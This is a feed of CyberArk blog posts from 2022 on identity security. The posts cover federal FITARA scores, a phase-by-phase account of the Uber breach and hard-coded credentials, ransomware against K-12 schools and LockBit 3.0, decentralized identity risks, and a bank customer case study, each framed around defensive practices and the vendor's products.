Read our white paper on how you can build a defense-in-depth approach that can help secure your organization against identity-focused attacks and data breaches.

]]>
Why and How Federal Agencies Need to Improve Their FITARA Scorecard https://www.cyberark.com/blog/why-and-how-federal-agencies-need-to-improve-their-fitara-scorecard/ Wed, 21 Sep 2022 13:00:35 +0000 https://www.cyberark.com/?p=134426

In a big, highly anticipated move, last week the White House introduced new cybersecurity guidance to harden federal networks and advance key priorities outlined in President Biden’s May 2021 executive order. While this particular order was aimed at enhancing the security of the software supply chain, the new and any other upcoming guidance seeks to affect the ability of the federal agencies to protect its sensitive data accessed across various resources and environments by its employees, partners and contractors.

The new guidance comes at a time when 10 out of the 24 federal agencies are scoring “F” on their overall cybersecurity practices, according to the FITARA Scorecard. These dismal scores are a reflection of the complexity faced by the federal agencies of over 4.2 million full time employees as well as countless contractors and valid contracts that allow external business to access sensitive information

How the FITARA Scorecard grades U.S. federal agency performance

The FITARA Scorecard grades U.S. federal agencies based on their performance of FITARA-related reform and improvement activities and serves as a tool for Congress, chief information officers, agency heads, and outside stakeholders to better understand how agencies across the government are managing and securing their information technology (IT). The Scorecard is also a way for Congress to hold federal agencies accountable for implementing basic and fundamental IT practices that improve the operation of the federal government.

This score tracks the agencies’ ability to continuously monitor their networks using tools to mitigate and remediate cyber threats. Grades are an average of two assessments: Scores from their Inspectors General (IG) assessments – which looks at agencies’ ability to identify, protect, detect, respond, and recover – and progress on cross-agency priority (CAP) cybersecurity goals.

Currently 10 of the 24 Federal Agencies are scored an F on cybersecurity practices.

Here’s why.

4,284,777 is not a random number.

In 2022, the federal government reported a total of 4,284,777 full time employees working across its three branches (executive, judiciary and legislative). Over 64% of these employees belong to the executive branch of civilians vs. 34% belong to uniformed military. These employees have varying responsibilities across the federal government. Many of them are granted different levels of security clearance that permit access to the most sensitive classified information. It is no easy feat to continuously manage the digital identities of over 4.2 million employees throughout their government service while protecting critical governmental assets related to national security and other public, sensitive priorities.

The threat is real.

Cybersecurity & Infrastructure Security Agency (CISA)’s Risk and Vulnerability Assessment (RVA) is available to both private and public organizations and specifically focuses on identifying network, system and application vulnerabilities by using a repeatable methodology to deliver actionable findings and recommendations.

Results from CISA’s RVAs conducted in FY2021 indicate that valid accounts were used to gain initial access in 51.5% percent of the FY21 RVAs. The same study indicates that privilege escalation for valid accounts occurred in 47.4% RVAs. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, and remote desktop.

The vulnerabilities are multi-fold.

No digital organization can function on its own. Certainly not federal agencies, which operate in conjunction with over hundreds of thousands of small, medium and large-sized vendors to whom over 358,204+ contracts were awarded to in 2021. In many cases, large-sized vendors are expected to sub-contract with small and mid-sized businesses when working for the federal agencies.

For example, in the summer of 2019, the Department of Defense (DoD) assessed the security controls implemented by 10 contractors to whom federal contacts of at least $1 million were awarded. The audits reveal that security controls were not consistently implemented in accordance with Federal and DoD requirements for safeguarding Defense CUI. The common shortcomings were:

  • User access was not granted on the user’s assigned duties and did not apply the principle of least privilege when granting access;
  • Use of weak passwords;
  • Lack of multi-factor authentication;
  • Failure to mitigate vulnerabilities identified on networks and systems;
  • Placement of CUI on unprotected removable media; and
  • Lack of limiting unsuccessful logon attempts to reduce the risk of malicious activities

These sub-optimal cybersecurity practices are further compounded when many of these large vendors have the ability to sub-contract Federal agency contract work to small and medium businesses that may not have adequate resources to maintain necessary security hygiene.

193 million machine identities are a problem.

The CyberArk 2022 Identity Security Threat Landscape Report indicates that for every human identity, there are 45 machine identities. Which means, for the 4,284,777 employee identities, it is possible that the federal agencies are managing over 193 million machine identities. Machine identities need to be protected to secure machine-to-machine communications and authentication, keep communications safe and private, and establish trust between connecting systems. Cyber criminals, malicious insiders and nation-state hackers unfortunately know that most agencies have limited visibility, policy enforcement and remediation of machine identities. This makes certificates and keys easy, high-value targets.

Identity Security with intelligent privileged controls is essential.

Securing identities by implementing a Zero Trust strategy as required by Executive Order 14028 is paramount in the face of such complexity and the increasing number of sophisticated cybersecurity attacks. By enforcing least privilege and enabling just-in-time and standing access for ALL identities – human and machine – federal agencies can easily automate and orchestrate Identity Security processes for holistic protections without security being in impediment to productivity.

Identity Security brings privileged controls by integrating identity management, access management and more importantly privileged access management. This not just enables Zero Trust but to also delivers measurable cyber risk reduction with an integrated approach to securing access for all identities to protect an organization’s applications, infrastructure, and data across a variety of environments.

Federal agencies must seriously consider an Identity Security strategy, especially because of the scale at which they operate and the sensitivity of data they gather for national security.

Improve your FITARA score with the CyberArk Identity Security Platform.

CyberArk’s mission is to provide a modern holistic, risk-based approach to Identity Security which is centered on intelligent privilege controls to secure access for any identity to any resource or environment from anywhere, using any device.

Built for the dynamic and evolving needs of federal agencies, the CyberArk Identity Security Platform enables secure access for any identity to various resources or environments from anywhere using a variety of devices. CyberArk’s deep security expertise and leadership in privileged access management for over 20 years allows us to expand intelligent privilege controls to a broader range of human and machine identities.

The CyberArk Identity Security Platform enables operational efficiencies with a single admin portal, streamlines meeting compliance requirements with unified audit capabilities, and delivers Identity Security Intelligence for continuous identity threat detection and protection.

 

 

]]>
Unpacking the Uber Breach https://www.cyberark.com/blog/unpacking-the-uber-breach/ Tue, 20 Sep 2022 20:06:38 +0000 https://www.cyberark.com/?p=134507 Uber breach attack path deconstruction

In the days following the September 15 Uber breach disclosure, much has been written about how one, allegedly 18-year-old attacker was able to successfully infiltrate the ridesharing giant’s IT infrastructure and gain access to sensitive user data. The human element of this story is getting lots of traction, with many zeroing in on multi-factor authentication (MFA) meltdowns and other Identity Security hygiene issues.

Uber’s September 19 security update answered some questions, while sparking new ones by naming Lapsus$ as a potential attacker group of interest.

As we continue to follow the story, we can’t help but ask, “Does it really matter who the attacker was, or how they got inside?” If you “assume breach,” then what makes this attack noteworthy (beyond the victim organization itself) is what happened after that.

Based on CyberArk Red Team’s analysis and available reports, we’re deconstructing the Uber breach with a focus on hard-coded credentials — the real flash point of this attack — which were reportedly used to gain administrative access to the organization’s privileged access management (PAM) solution (provided by another vendor), unlocking more high-risk access. We’ll also show how layered defenses can work together to help slow down or block similar attacks.

“Much of the Uber cyber attack analysis has focused on social engineering and multiple MFA attack vectors, but the real turning point for the attack happened post initial access. The presence of embedded credentials, in a misconfigured network share is critical to deconstructing this attack. It was the harvesting credentials for a PAM solution embedded in PowerShell script that allowed the attacker to gain high-level access, escalate privileges and set off on a veritable field day inside Uber’s IT environment. Proactive protection relies on implementing multiple security layers but most importantly, as this attack reinforces, the biggest takeaway is assume breach.”

– Shay Nahari, Vice President, Red Team Services, CyberArk

Deconstructing the Uber Attack: What We Reportedly Know

Uber Breach DeconstructionPhase 1: Initial Access. The attacker got inside Uber’s IT environment by gaining access to credentials to Uber’s VPN infrastructure.

Phase 2: Discovery. Most likely, this contractor did not have special or elevated privileges to sensitive resources but did have access to a network share, as did other Uber workers. This network share was either open or misconfigured to allow broad read ACL. Within the network share, the attacker discovered a PowerShell script containing hard-coded privileged credentials to Uber’s PAM solution.

A brief aside: Both IT teams and developers often automate tasks by creating scripts that need some form of credentials to perform authentication (e.g., manual backup or generating custom reports by pulling data from databases). These credentials could be anything from SSH keys and API tokens to other types of passwords and privileged tokens. To save time and help ensure automation, it’s common for developers to embed (or hard code) these credentials into the code. This leaves the credentials exposed to everyone with access to the code and makes them difficult to manage and rotate. In the Uber breach, hard-coded credentials granted administrative access to a privileged access management solution. These credentials appear not to have been rotated in some time — making them much easier to exploit.

Phase 3: Privilege Escalation, Access PAM System. By harvesting the hard-coded admin credentials for the privileged access management solution, the attacker was able to further escalate privileges.

Phase 4: Access Secrets from PAM System, Reach Critical Company Systems. According to Uber’s latest update, the attacker ultimately gained “elevated permissions to a number of tools.” By accessing secrets from the privileged access management solution, the potential for damage was significant: The attacker reportedly compromised access to the SSO and consoles as well as to the cloud management console where Uber stores sensitive customer and financial data.

Phase 5: Data Exfiltration. While Uber is still investigating the incident, the company confirmed that the attacker “downloaded some internal Slack messages, as well as accessed or downloaded information from an internal tool our finance team uses to manage some invoices.”

Tips for Tackling Embedded Credentials as Part of a Defense-in-Depth Strategy

From our point of view, proactive protection requires defense-in-depth — a mix of complementary security layers — supporting a Zero Trust strategy that utilizes strong least privilege controls. Perhaps most important in this case is to not have embedded credentials in the first place.

To reduce cyber risk in your own organization, we recommend focusing on eliminating this practice, and taking inventory of your environment to find and remove hard-coded credentials that exist in code, PaaS configurations, DevOps tools and internally developed applications. We know this is easier said than done, so focus on your organization’s most critical and powerful credentials and secrets first and then expand these secrets management best practices to measurably reduce risk over time.

After you’ve made a plan for tackling hard-coded credentials, consider these additional steps to harden your defenses:

  • Credential theft remains the No. 1 area of risk. And as seen recently, attackers are getting better at bypassing MFA using a variety of vectors and techniques — there were multiple MFA compromises in this story. Your employees are your gatekeepers — train them regularly to spot and report phishing to help prevent identity compromise. Expect vigilance, but not perfection, as attacks keep evolving.
  • Consistently enforce the principle of least privilege, starting at the endpoint, to help ensure employees and external contractors have the lowest level of permissions possible to do their jobs. Configure privileged access management solutions with least privilege in place. Admins should only have access to privileged accounts that are absolutely necessary for their jobs. All access using privileged accounts should be isolated and authenticated.
  • This attack emphasized the “secret zero” problem that security practitioners have long grappled with: What happens if someone gains access to the ultimate credential that protects all other credentials? This is why strong proactive and reactive defense-in-depth controls are equally critical. So even if MFA falls down, there are additional mechanisms in place to identify and block threats before they reach this point.
  • Minimize standing privileged access. Removing standing access to sensitive infrastructure and web or cloud consoles can help organizations limit lateral movement from compromise to a powerful security solution. Especially combined with strong authentication, just-in-time elevation of privileges can greatly reduce the access of any compromised identity, limiting the blast radius of an attacker.

This was not a breach for which a single individual or vendor was at fault, nor was it a breach that a single technology solution could have prevented. That’s why defense-in-depth is so important: It makes it harder for attackers to work, move and, ultimately, accomplish their goals.

]]>
K-12 Schools in the Crosshairs of Ransomware https://www.cyberark.com/blog/k-12-schools-in-the-crosshairs-of-ransomware/ Tue, 13 Sep 2022 13:00:17 +0000 https://www.cyberark.com/?p=134273 K-12 Schools in the Crosshairs of Ransomware

If staggering staffing shortages, razor-thin budgets, safety issues and politically driven controversies weren’t enough to contend with, U.S. schools are facing another major crisis: skyrocketing ransomware attacks.

You’ve likely read news stories about educational institutions under attack in recent weeks. This timing is no coincidence: A new school year spells new opportunity for attackers. Just last week, the U.S. Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint cybersecurity advisory (CSA) warning that threat actors are “disproportionately targeting the education sector with ransomware attacks,” especially kindergarten through twelfth grade (K-12) institutions.

These attacks have resulted in “restricted access to networks and data, delayed exams, canceled school days and unauthorized access to and theft of personal information regarding students and staff,” CSA authors note.

Why K-12 schools? CyberArk’s Matt Kenslea – whose years of public sector work give him insight into many of today’s top education challenges – says it all comes back to opportunity. “Many attackers go after weakness and many of these schools are understaffed, underfunded and highly vulnerable. The attackers are many, their tools are varied and often-overworked staff can struggle to keep up.”

“School districts, especially those in large, urban environments have to do so much: Feed students, bus students, teach students, provide individualized support for students – many of whom speak different languages – and keep students safe. With so many competing priorities, hiring and keeping specialized cybersecurity staff is a massive challenge,” says Kenslea. “Many school districts don’t – or can’t – make investments in cybersecurity until after an attack.”

According to the CSA, K-12 institutions are also attractive targets given “the amount of sensitive student data accessible through school systems or their managed service providers.” Last year, an NBC News investigation found that ransomware groups had published sensitive personal data on American schoolchildren from more than 1,200 schools.

Frank W. Abagnale, a world-renowned identity fraud expert, has described why cyber criminals prefer to steal the identities of younger people in this way: “I’ll take the student every time. Because a child has no credit, and the child is not likely to seek credit for many years. So I can steal the identity of a two-year-old, I can be that two-year-old for a long period of time before anyone ever finds out I’ve stolen that two-year-old’s identity. That’s why on the black market a two-year-old’s identity sells for a lot more than a 14-year-old’s, simply because you have a lot longer to sell it.”

New-School Ransomware Attacks Target Faculty and Staff Endpoints as an Entry Point

With the benefit of ransomware-as-a-service platforms, it’s easy for just about anyone with internet access to launch an attack on a school. In fact, 56% of K-12 schools worldwide report being hit by ransomware in the last year.

“By and large, ransomware attackers are getting in from local endpoints, such network-connected PCs, Macs and laptops used by staff and faculty members,” Kenslea explains. Even if anti-virus is installed on the machine, attackers can often slip past it, since these tools rely primarily on known threats and behavior patterns and frequently miss targeted and novel threats (remember, ransomware is constantly changing).

Oftentimes, these endpoint devices have active accounts with local admin rights, which enable device users to perform tasks such as running system or software updates, controlling files and using hardware. The trouble is, those admin rights are exactly what many ransomware attackers need to move further into an environment, deploy malware, encrypt files and hold them for ransom. In almost every instance, attackers look for ways to penetrate, linger and lurk on a system, waiting for opportunities to move laterally and then escalate privileges by compromising accounts with local admin rights.

Even if they aren’t meant to have local admin rights, users sometimes wind up with them anyway. “Scrambling to fill vacant positions, schools are issuing new staff members laptops and getting them into classrooms in a hurry. People make mistakes, especially when they’re rushing,” says Kenslea. Even when schools are on top of managing their Active Directory, they often overlook access control lists (ACL) and those legacy privileges can be exploited.

The obvious solution would be to just take local admin rights away, right? Not so fast, Kenslea warns. “Education is an open, collaborative environment, teachers share with students, parents and colleagues across the country and the world. Removing local admin rights on all endpoints will create friction and pushback – like when the superintendent can’t even install a printer or read a textbook file. And as they say, ‘You don’t want that smoke.’”

“It can’t be an all or nothing thing,” he continues. “It’s about finding a better balance between permission control and giving very overworked people the access they need to do their jobs.”

Ransomware Blocking at the Endpoint, the Biggest Bang for Schools’ Risk Reduction Buck

In the recent CSA, the FBI, CISA and the MS-ISAC highlight detailed defense-in-depth recommendations for the education sector. Some of these mitigations can be done quickly, such as adding an email banner to emails received from outside the organization. Other steps, such as network segmentation, will take more time and ongoing effort.

For most K-12 schools, ransomware protection ultimately comes down to budget and strategic prioritization. “Since they can’t do everything, schools are looking for the biggest cyber risk reduction ‘bang for their buck,’ in the shortest amount of time possible,” says Kenslea.

“Hardening the endpoint – where ransomware attacks so often begin – is the best place to start,” he continues. To do this, he urges schools to follow the CSA’s guidance of immediately addressing known vulnerabilities, implementing multifactor authentication (MFA) for high-impact actions if it’s not already enforced and getting serious about cybersecurity training to help faculty identify phishing and other credential theft attempts.

As a backstop to those three mitigation steps, he offers a fourth recommendation: “Find a flexible, automatic way to control local admin rights and applications, giving staff, faculty members and other users the lowest clearance level possible that allows them to perform their role.” Also known as least privilege enforcement, this defense-in-depth protection can be rolled out quickly to help schools strengthen their security posture, reduce ransomware exposure and focus on what matters most – shaping lives through learning.

]]>
Cybersecurity Basics Build on Fundamental Childhood Lessons https://www.cyberark.com/blog/cybersecurity-basics-build-on-fundamental-childhood-lessons/ Fri, 09 Sep 2022 13:00:05 +0000 https://www.cyberark.com/?p=134144 Cybersecurity Basics Build on Fundamental Childhood Lessons

The human brain grows at an incredible rate during childhood, forming trillions of connections and absorbing information like a sponge. As we grow up, the impact of early life lessons tends to stick around, helping us navigate new situations and simplify complex challenges. Take cybersecurity, for example. When considering ways to protect your digital identities at home and at work, some of the most pertinent advice comes from way back when.

Be yourself. Don’t follow the crowd – especially when it comes to choosing passwords. There’s nothing special or secure about “12345678.” Be creative and use your unique attributes (like your fingerprints, facial structure and voice) as additional security layers to help keep your online accounts and sensitive information safe.

Don’t take candy from strangers. If someone you don’t know offers you something like an email attachment or link, don’t open or click on it. There’s no telling what could be in there. Same goes for phone calls. If someone asks for personal or account information – even if they sound completely legit – don’t fall for it.

Siblings can’t read (or don’t care) about those “KEEP OUT” signs on your door. There was no stopping your sister from barging into your room and rifling through your stuff, so your prized possessions were placed on the top shelf, out of her reach, hidden behind a stack of books – and protected by carefully constructed booby traps and your pet tarantula. She couldn’t get close to your baseball card collection without you finding out. (Yes, we’re still working through a few issues.) A similar strategy can help keep attackers away from your company’s most sensitive data and systems. (Arachnids are an optional layer.)

Everyone makes mistakes. Most cybersecurity incidents start with imperfect people (in other words, everyone) making careless or time-saving security errors. Security is everyone’s job, so make every effort to follow cybersecurity best practices and take advantage of security training, resources and even podcasts to expand your skills and knowledge. But never leave things to chance. At the end of the day, that’s what Zero Trust is all about.

Never stop learning. As smart as you thought you were at eight years old, it turns out you still had a lot to learn (and still do). The cyber threat landscape is always changing, and staying ahead of attackers requires constant learning, innovation and refinement. While it’s impossible to know everything, AI and automation can help fill in gaps, dynamically measure risk and help improve intelligence and performance over time.

Look both ways before crossing the street. People make smarter, safer decisions when they can see the full picture. When it comes to protecting your organization against cyber threats, better visibility can help you eliminate guesswork, optimize internal resources and detect and respond to potential threats faster – before damage is done. For example, real-time insights on workforce and IT user activity in web applications and infrastructure can help minimize credential theft – the No. 1 area of risk today.

And finally… anything is possible. You have so much potential. Your cybersecurity approach should help you unleash – never hold back – that potential and drive your digital business fearlessly forward.    

 

]]>
Decentralized Identity on the Blockchain Promises a New Era of Consumer Privacy. But Can It Deliver? https://www.cyberark.com/blog/decentralized-identity-on-the-blockchain-promises-a-new-era-of-consumer-privacy-but-can-it-deliver/ Fri, 26 Aug 2022 13:27:22 +0000 https://www.cyberark.com/?p=133753 Decentralized Identity on the Blockchain Promises a New Era of Consumer Privacy. But Can It Deliver?

What is my identity? I’m not having an existential moment; instead, I’m asking how others recognize me. How do they know for sure that I am who I say I am?

In the physical world, we carry proof of identification to help verify our identities, and most of us have many: a passport, driver’s license, library card and more. We keep these on our person and do our best to safeguard them.

In the digital world, we have usernames and passwords — roughly 85 combinations per person. We use them to access our “identity objects,” stored by identity providers (IdPs) so we don’t have to hold them ourselves, and access everything from personal bank accounts to work emails. For example, if you’ve ever used your Google password to log in to a retail site while shopping online, you’ve used an IdP. As the IdP, Google holds your identity data and shares it with the retail site when you authorize the action.

By using an IdP, you’ve essentially shifted the responsibility of protecting your identity data to a system that is, in fact, protected by a password. Anyone who knows it, steals it or cracks it could assume your identity. Additionally, an IdP could mistakenly leak your data or even block your access to your identity and in turn, block your access to all the sites using this IdP.

A Tide Change Brings New Expectations for Personal Data Privacy

“A convergence of consumer, government, and market forces are now giving users more control over the data they generate. Instead of serving as a resource that can be freely harvested, countries in every region of the world have begun to treat personal data as an asset owned by individuals and held in trust by firms.” – Harvard Business Review

Identity theft happens every 22 seconds. Consumers are fed up and starting to question whether any third-party system should have such broad control over their personal data, and especially, their identity data. They’re also considering what could happen if this data were ever to be modified or even erased in the future. As these questions swirl, decentralized identity (DID) has emerged as an intriguing potential alternative.

The Decentralized Identity Vision

Decentralized identity, aka self-sovereign or distributed identity, is an open framework that’s being developed to help establish unique and secure access connections between parties or systems without the need for a third-party “connection broker.”

DID is designed to mimic a digital wallet of sorts, in which users store their various identities, or claims. Individuals are solely responsible for keeping their claims safe and release only the minimum information required to forge a secure, trusted connection. No passwords exchange hands; instead, biometric authentication such as a fingerprint or facial recognition is used. Meanwhile, the underlying decentralized blockchain technology works to ensure claims are cryptographically authentic and tamper proof, significantly reducing the risk of fraud.

Here’s what this looks like in action: You request claims or “verifiable credentials” from various entities, such as a transportation department or your local coffee shop, and store them in your digital wallet. Each organization or “claims issuer” creates a unique claim that contains both personal data (to prove who you are), as well as authentication data (specifying your permissions or levels of access) about you. Different entities require differing levels of attestation to enable trusted data exchange. For instance, your Starbucks claims couldn’t help you board an international flight, but it could unlock rewards and special coupons. To make sure a claim is legitimate, a claims issuer may also assume the role of “claims verifier,” such as when a police officer asks for your license and registration at a traffic stop.

By giving identity data control back to the people, DID is a compelling visionary concept. However, like all major technology shifts, it presents numerous challenges. The first is getting people on board with such a big change in their daily routines — it’s a mindset transformation will take time and a Herculean effort. Then there are technological constraints, such as standardization (just think of the long global journey to 5G and the different blockchains currently competing for dominance) and technology maturity. What happens if your digital wallet fails to back up properly or the “right to be forgotten” if you wish to eliminate your digital footprint? But perhaps the biggest hurdle of all is managing and securing the massive attack surface DID creates.

The Darker Side of DID: 5 Cybersecurity Risks

The decentralized identity attack surface can be categorized into five distinct areas:

  1. The blockchain code itself. In decentralized systems, everything is based on a blockchain. This is what is used to store identity operations, such as creating an identity, revoking keys or restoring an identity. Every blockchain contains nodes used to validate transactions, write to it and read from it. Both the blockchain and its nodes are made up of code. As with all new software code, they are likely to contain bugs, some of which can turn out to be security issues or vulnerabilities. Every DID implementation introduces a different attack surface.
  2. Fallible humans hold the keys to the kingdom. At the end of the day, distributed systems are only as secure as the private keys that run them. And humans — notorious for making mistakes — are the ones storing and using those keys. In this regard, the promise of DID is a double-edged sword.
  3. Post-authorization cookies could be compromised. When you use a standard centralized identity, you typically get a cookie or an access token that will identify your session for the near future. Now let’s say you’ve authenticated to some service using DID. Now what? Your identity could depend on a single cookie and not on the decentralized system. If malware happens to be running on your phone or laptop, it could potentially steal that cookie or access token after the DID authentication flow is finished.
  4. Nodes can be used maliciously. A new security issue unique to distributed systems is the process of forging trust between a client and a node. The average person can’t read or keep track of an entire blockchain — that’s what nodes are meant to do, as well as to provide reliable data for the chain. The problem is, some nodes can be malicious, or an attacker can try to intercept someone’s communication with that node and try to modify the data. While various systems work to resolve this issue, this is an ongoing challenge across all decentralized systems, and identity systems are no exception.
  5. Traditional security challenges don’t disappear. Since no one lives solely in the blockchain world, every distributed system must have some degree of connection to the real world and other systems that are off the chain. These systems — from node API request handlers to bridges between ledgers and “classic” systems (i.e., relational or NoSQL databases, middleware business logic or front-end application code) — are susceptible to all the “regular” cyber threats.

Years of problematic passwords and endemic identity fraud have highlighted the need for stronger, more secure ways for people to authenticate themselves. Decentralized identity offers some exciting possibilities — but it also presents formidable cybersecurity challenges and new attack surfaces.

DID technology itself is still in its infancy stage. It will take many great minds working together to overcome significant security obstacles, but with enough time, iteration and collaboration, I’m optimistic that DID will mature into a highly effective way to prove “I am who I say I am” in the future.

This post is based on the CyberArk Impact 2022 session “Decentralized Identity: The Good, the Bad and the Ugly,” presented by Daniel Schwartzer, Chief Product Technologist, CyberArk and Shaked Reiner, Principal Security Researcher, CyberArk Labs

]]>
LockBit 3.0 Ransomware Learns from Defenders, Launches Bug Bounty Program, Begs “Hack Me” https://www.cyberark.com/blog/lockbit-3-0-ransomware-learns-from-defenders-launches-bug-bounty-program-begs-hack-me/ Tue, 23 Aug 2022 13:00:43 +0000 https://www.cyberark.com/?p=133565 LockBit 3.0 Ransomware Bug Bounty Program

The evolution of LockBit – one of the largest ransomware as a service (RaaS) operations in history – exemplifies continued attack commoditization and underground innovation. Since LockBit 3.0 (aka LockBit Black) launched in June 2022, the latest version continues to make headlines – recently for exploiting the Log4j vulnerability and abusing a popular anti-virus system to evade detection. As ransomware threats continue to morph, such reports highlight the importance of defense-in-depth security.

What is LockBit Ransomware?

Known as “ABCD” when it first appeared in September 2019, LockBit soon morphed into a RaaS affiliate program, a subscription-based business model that allows criminals of all skill levels to purchase off-the-shelf ransomware from developers who earn a percentage of each ransom payment.

Relaunched in mid-2021 with enhanced features, LockBit 2.0 was touted by its creators as the “fastest encryption software all over the world.” This was eventually put to the test by researchers who found the claim to be true. LockBit 2.0 quickly skyrocketed in popularity, used by threat actors to target both Windows PCs and Linux hosts (ESXi servers) in double-extortion attempts. As ZDNet put it, “LockBit’s operators use any method available to compromise a network, as long as it works.” In February 2022, the FBI warned organizations to bolster ransomware defenses against LockBit 2.0, which followed variations of this attack chain:

LockBit Ransomware Sample Attack

LockBit 2.0 attack chain example. (Sources: CyberArk Labs, FBI, CSO)

All the while, the highly organized LockBit group continued to innovate and uplevel its operations, joining forces with other ransomware gangs, promoting underground hackathons to attract new talent, and even recruiting corporate insiders to help establish initial access into their employers’ networks. Competitor Conti’s reported disbandment appears to have further strengthened LockBit’s market position. CSO reports that LockBit was responsible for 40% of all analyzed ransomware attacks in May 2022. After a product revamp and beta testing period, LockBit 3.0 was released in late June 2022 with a brazen “Make Ransomware Great Again” tagline and new rules of engagement for both affiliate members and victim organizations.

What’s Most Notable About LockBit 3.0 and Recently Observed Activity?

Threat researchers from around the world continue to work to obtain and analyze LockBit 3.0 samples and share findings to help organizations strengthen ransomware defenses. Based on these collaborative efforts, media reports and CyberArk Labs’ analysis to date, here are three notable LockBit 3.0 characteristics:

  • A first-of-its-kind bug bounty program and new leak site. In March 2022, Microsoft researchers published a report on critical bugs in LockBit 2.0 – a potential contributing factor to the 3.0 release and LockBit’s warning to affiliate program candidates that “we are constantly trying to be hacked and harmed in some way,” as reported by VentureBeat. With a bug bounty program, the LockBit gang is working to get a handle on their own malware vulnerabilities so they can address them, and also prevent researchers and responders from reversing the ransomware’s impact.
  • Anti-analysis protections. One of the most interesting changes made was the introduction of a unique passcode for every LockBit 3.0 sample. Without the passcode, the sample won’t run. This means that researchers, competitors, or whomever cannot analyze the malware dynamically without a password. Such anti-analysis measures could soon be embraced by other ransomware groups, and it’s a potential ransomware trend worth tracking.
  • Novel living off the land (LotL) techniques that weaponize critical security tools. Threat researchers have reportedly observed LockBit 3.0 actors obtaining initial access via the Log4j vulnerability, employing new tactics to weaponize legitimate security tools that often operate outside of installed security controls, and evade detection by EDR and traditional anti-virus tools.

These recent revelations emphasize the need for threat detection controls and policies that can help identify and block suspicious activities that may be linked to Log4j or other critical vulnerabilities right away. For instance, configuring policies to detect and block instances of java.exe being used as a parent process for cmd.exe or powershell.exe is one way to block potential Log4j and similar exploitation, as it is very unlikely that java.exe would initiate these processes in a legitimate scenario. Additionally, continuous control of all launched and running programs and their associated privileges will add significant friction for attackers if they attempt to launch a ransomware payload, tamper with security and recovery controls, or try to chain vulnerabilities.

Why Anti-Ransomware Protection Requires Defense in Depth

Ransomware actors will continue to evolve their approaches and, as evidenced by LockBit 3.0, every product version is an opportunity to change up the game.

That’s why effective anti-ransomware protection involves locking down the endpoint and working to prevent malware from being successful at every step of the cyber kill chain – but never at the end-user’s expense. Embracing the right set of multi-layered defenses, including privileged endpoint security controls, can help strike a balance between security and productivity – protecting endpoints while automating access elevations for end-users in a transparent manner to dismantle the cyber kill chain, forcing the attacker to look elsewhere.

Here’s what this looks like: Consistent least privilege enforcement (both for initial system access and continued operation on endpoints – workstations and servers alike), layered with foundational endpoint controls such as a credential theft blocking, targeted data-centric anti-ransomware policies, application control, MFA, continuous threat detection and response, consistent OS and software patching and network segmentation, will help position organizations to detect and defend against ransomware attacks of all varieties.

]]>
Identity Security in Action at Diamond Trust Bank https://www.cyberark.com/blog/identity-security-in-action-at-diamond-trust-bank/ Fri, 19 Aug 2022 13:00:27 +0000 https://www.cyberark.com/?p=133554

For more than 70 years, customers in East Africa have trusted Diamond Trust Bank (DTB) for their banking needs. Listed on the Nairobi Securities Exchange (NSE), the leading regional bank is an affiliate of the Aga Khan Development Network (AKDN) and has more than 130 branches and 24/7 digital branches across Kenya, Tanzania, Uganda and Burundi.

Assistant Senior Manager Aarif Mawani leads Diamond Trust Bank’s dedicated Identity and Access Management (IAM) team, an integral part of DTB’s larger cybersecurity function. As a virtual presenter at our CyberArk Impact 2022 event, Mawani described the organization’s Identity Security journey, along with valuable best practices for others to consider as they chart their course.

Building the Business Case for Identity Security

In 2019, the regulatory compliance landscape was changing quickly. The SWIFT Customer Security Controls Framework (CSCF) had recently gone into effect, requiring all financial institutions using the global messaging network to comply with heightened cybersecurity standards. Mandatory controls focused heavily on securing the member institution’s environment, knowing “who” and “what” has access to critical systems and applications, and detecting and responding to high-risk activity in operator sessions.

A strong emphasis on cyber governance led the Diamond Trust IAM team to examine existing privileged access controls and move to formalize an Identity Security program centered on a strong and consistent privileged access management policy. An enterprise-wide discovery scan of privileged identities, accounts and credentials provided a clear picture of the organization’s identity risk landscape. Harnessing these insights, the team presented a plan to senior leadership, who recognized intelligent privilege controls are the linchpin for securing critical assets and preserving trust.

Laying a Strong Foundation with Privileged Access Management

After a rigorous evaluation, the Diamond Trust Bank IAM team partnered with CyberArk on their journey to secure the expanding number of identities across their environment. Their mission was clear: “To ensure that privileged and non-privileged users, as well as non-user access to information and communications technology (ICT) resources, follow the principle of least privilege through the identity lifecycle,” explained Mawani.

With critical top-down support, the team got to work designing a program – “not a project,” he stressed – spanning people, processes and technology. The heightened SWIFT CSCF requirements helped to create a sense of urgency to prioritize and accelerate the onboarding process.

Pivoting Quickly: “Necessity is the Mother of Invention”

But just as Mawani and team began evaluating security configurations, the COVID-19 pandemic changed everything.

The bank works with numerous third-party vendors to deliver innovative services to its customers. Many vendor representatives worked on-site at DTB offices under the supervision of DTB personnel, until the pandemic forced everyone to work from home. Virtually overnight, the need for remote vendor connections – via VPN and other traditional remote tools – more than doubled. “The ability to monitor these sessions became a must for us,” said Mawani.

The team quickly pivoted to extend privileged access management controls to support off-site vendors. They obtained necessary stakeholder support by demonstrating the ability to provision, manage and secure third-party access to critical resources with full session isolation, monitoring and audit capabilities – all while leveraging biometrics for multi-factor authentication (MFA) instead of VPNs, passwords or agents.

In 2021, the team was also tapped to integrate CyberArk with the bank’s SWIFT-compliant systems, which entailed building autoIT scripts to enable web-based connections with session isolation and monitoring.

After successfully transforming these IT challenges into opportunities and achieving measurable wins, the Diamond Trust IAM team turned its focus to Identity Security expansion, such as establishing cloud least privilege to reduce cyber risk and enhance visibility, securing secrets used by the organization’s vulnerability management application and other non-human identities, and broadening identity-centric intelligence and threat detection capabilities.

Sharing Identity Security Success Factors and Lessons Learned

Mawani emphasized several key success factors and lessons learned throughout Diamond Trust Bank’s ongoing journey:

  • Focus on the big picture. From session management to password management, your program must stay in sync with the broader cybersecurity strategy.
  • Collaboration is key. A defined communication strategy focused on end-user awareness and education is critical for overcoming objections, an inevitable part of any major change initiative. Sharing real user benefits and experiences will help make good training materials great.
  • Management buy-in isn’t enough. Most action happens on the front lines. You will need aggressive foot soldiers, so cultivate both employee and vendor champions.
  • Stay vigilant about program fatigue. Remember, Identity Security is an ongoing program, not a point-in-time project.
